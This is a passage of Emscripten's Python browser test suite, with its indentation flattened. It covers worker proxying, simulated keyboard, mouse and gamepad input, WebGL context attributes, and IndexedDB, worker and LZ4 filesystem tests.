def test_sdl_canvas_proxy(self):
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
def test_glgears_proxy(self):
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
    # run normally (duplicates the above test, but verifies we can run outside of the btest harness)
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
original = open('test.js').read()
def copy(to, js_mod, html_mod = lambda x: x):
open(to + '.html', 'w').write(html_mod(open('test.html').read().replace('test.js', to + '.js')))
open(to + '.js', 'w').write(js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut']).communicate()
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/kripken/emscripten/issues/4069.
open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print(delay, defines, emterps)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
%s
//Module.print('push keydown');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
//Module.print('push keyup');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keypress(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'test_glfw_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
    # perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
def test_emscripten_get_now(self):
self.btest('emscripten_get_now.cpp', '1')
def test_fflush(self):
return self.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
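    # Two runs per MEMFS mode: the first (-DFIRST) stores the secret and persists it to IDBFS, the second run reads it back after a reload.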
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-lidbfs.js', '-s', 'NO_EXIT_RUNTIME=0']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
    args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'NO_EXIT_RUNTIME=0']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
    secret = 'a' * 10
    secret2 = 'b' * 10
open(self.in_dir('pre.js'), 'w').write('''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
open('file1.txt', 'w').write('first')
if not os.path.exists('sub'): os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
Popen([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js']).communicate()
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
import random
self.clear()
os.mkdir('subdir')
open('file1.txt', 'w').write('0123456789' * (1024*128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024*128))
random_data = bytearray(random.randint(0,255) for x in range(1024*128*10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
    # compress in emcc; -s LZ4=1 tells it to pass the LZ4 option on to the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
assert os.stat('file1.txt').st_size + os.stat(os.path.join('subdir', 'file2.txt')).st_size + os.stat('file3.txt').st_size == 3*1024*128*10 + 1
assert os.stat('test.data').st_size < (3*1024*128*10)/2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
    # compress in the file packager, on the server. The client receives compressed data and can use it directly; this is the typical usage.
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_idbstore(self):
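    # Each stage exercises the IDB store code differently; the stage number is passed in via -DSTAGE and the test is expected to report that same number.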
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'])
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17')
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file', path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_p(self):
# Immediate mode with pointers
